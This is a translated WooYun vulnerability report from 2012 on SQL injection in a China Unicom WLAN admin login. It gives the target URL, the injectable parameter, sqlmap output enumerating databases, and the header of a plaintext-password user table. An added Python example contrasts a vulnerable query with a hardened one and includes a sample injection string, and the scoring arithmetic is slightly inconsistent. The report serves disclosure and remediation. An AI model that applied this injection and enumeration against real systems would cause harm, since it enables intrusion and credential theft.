
Vulnerability summary

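Bug ID: wooyun-2012-014714

Title: SQL injection in a China Unicom forum, plaintext passwords, instantly bewildered

Vendor: China Unicom headquarters

Author: SbbS

Submitted: 2012-11-13 12:57

Fixed: 2012-12-28 12:58

Disclosed: 2012-12-28 12:58

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 20

Status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org (for questions or help, contact [email protected])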



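Vulnerability details

Disclosure status:

2012-11-13: Details sent to the vendor; awaiting vendor handling
2012-11-14: Vendor has confirmed; details disclosed to the vendor only
2012-11-24: Details disclosed to core white hats and experts in related fields
2012-12-04: Details disclosed to regular white hats
2012-12-14: Details disclosed to trainee white hats
2012-12-28: Details disclosed to the public

Brief description:

SQL injection in a China Unicom forum, plaintext passwords, instantly bewildered

Detailed description:

http://wlan.bbn.com.cn:8089/n_wlan/admin/login.php?action=login
The username parameter is injectable in the POST request.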

there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 0
[09:51:22] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Microsoft SQL Server 2005
[09:51:22] [INFO] fetching database names
[09:51:22] [INFO] the SQL query used returns 19 entries
[09:51:22] [INFO] starting 10 threads
[09:51:22] [INFO] resumed: "BBNEduBlog"
[09:51:22] [INFO] resumed: "BBNEduDev"
[09:51:22] [INFO] resumed: "BBNEduGK"
[09:51:22] [INFO] resumed: "BBNEduSearch"
[09:51:22] [INFO] resumed: "EduShop"
[09:51:22] [INFO] resumed: "kaoshi"
[09:51:22] [INFO] resumed: "model"
[09:51:22] [INFO] resumed: "luck"
[09:51:22] [INFO] resumed: "school"
[09:51:22] [INFO] resumed: "schoold"
[09:51:22] [INFO] resumed: "tempdb"
[09:51:22] [INFO] resumed: "TRSWCMV65"
[09:51:22] [INFO] resumed: "WebBlog"
[09:51:22] [INFO] resumed: "www_bbn_com_cn_edu"
[09:51:22] [INFO] resumed: "www_bbn_com_cn_edu_bbs"
[09:51:22] [INFO] resumed: "www_bbn_com_cn_kaoshi"
[09:51:22] [INFO] resumed: "msdb"
[09:51:22] [INFO] resumed: "QuestSoftware"
[09:51:22] [INFO] resumed: "master"
available databases [19]:
[*] BBNEduBlog
[*] BBNEduDev
[*] BBNEduGK
[*] BBNEduSearch
[*] EduShop
[*] kaoshi
[*] luck
[*] master
[*] model
[*] msdb
[*] QuestSoftware
[*] school
[*] schoold
[*] tempdb
[*] TRSWCMV65
[*] WebBlog
[*] www_bbn_com_cn_edu
[*] www_bbn_com_cn_edu_bbs
[*] www_bbn_com_cn_kaoshi


I won't bother posting the XSS, the admin backend and so on. I just like injection, and I'm a newbie.

Database: luck
Table: dbo.tb1_user
[100 entries]
+------+------------+--------------+
| u_id | u_password | u_username |
+------+------------+--------------+

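Proof of vulnerability:

[Screenshots: 1.png, 2.png]

Fix:

I don't know whether you think you're just that awesome or what, storing passwords in plaintext, but the awesomeness didn't work out: someone has already gotten in. I don't know what your engineers are doing, sitting out a postpartum confinement?

Copyright notice: when reposting, please credit the source SbbS@WooYun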
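The two defects reported above, a login query built by string concatenation and passwords stored in plaintext, are shown here beside a corrected form. This is an added example, not code from the report or the affected site; it uses Python and an in-memory SQLite database as stand-ins for the PHP and SQL Server stack, the column names u_username and u_password follow the dumped table header, and the table names, function names and sample account are hypothetical.

```python
import hashlib, hmac, os, sqlite3

def hash_password(password, salt=None, iterations=200_000):
    """Return (salt, PBKDF2-HMAC-SHA256 digest); only these are stored."""
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)

def make_db():
    """Constructed sample data: one legacy plaintext table, one hardened table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users_plain (u_username TEXT, u_password TEXT)")
    db.execute("INSERT INTO users_plain VALUES ('alice', 'correct-horse')")
    db.execute("CREATE TABLE users_hashed "
               "(u_username TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt, digest = hash_password("correct-horse")
    db.execute("INSERT INTO users_hashed VALUES (?, ?, ?)", ("alice", salt, digest))
    return db

def login_vulnerable(db, username, password):
    """The flawed pattern: input concatenated into a single-quoted SQL string."""
    sql = ("SELECT 1 FROM users_plain WHERE u_username = '" + username +
           "' AND u_password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_hardened(db, username, password):
    """Bound parameter for the lookup, constant-time compare of salted hashes."""
    row = db.execute(
        "SELECT salt, pw_hash FROM users_hashed WHERE u_username = ?",
        (username,)).fetchone()
    if row is None:
        hash_password(password)  # spend similar time for unknown users
        return False
    salt, stored = row
    return hmac.compare_digest(stored, hash_password(password, salt)[1])

if __name__ == "__main__":
    db = make_db()
    quoted = "alice' --"  # constructed input containing a quote and a comment
    print("vulnerable, wrong password:", login_vulnerable(db, quoted, "wrong"))
    print("hardened,   wrong password:", login_hardened(db, quoted, "wrong"))
    print("hardened, correct password:", login_hardened(db, "alice", "correct-horse"))
```

With the hardened table, a dump of the user table yields only salts and digests, so a read-only injection elsewhere in the application no longer exposes reusable passwords.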


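Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2012-11-14 15:37

Vendor reply:

CNVD confirmed the vulnerability but did not reproduce it in real time (the login form no longer exists, the referer and URL are hard to find, and it cannot be reproduced with SQLMAP). It has been passed to CNCERT to notify China Unicom Group directly for handling.
Scored as complete impact on confidentiality (whether privilege escalation on SQL Server is possible is unknown): base severity score 7.79, discovery technical difficulty coefficient 1.1, affected industry or organization impact coefficient 1.4 (broadband user information may be involved), overall rank=7.79*1.0*1.4=10.906

Latest status:

None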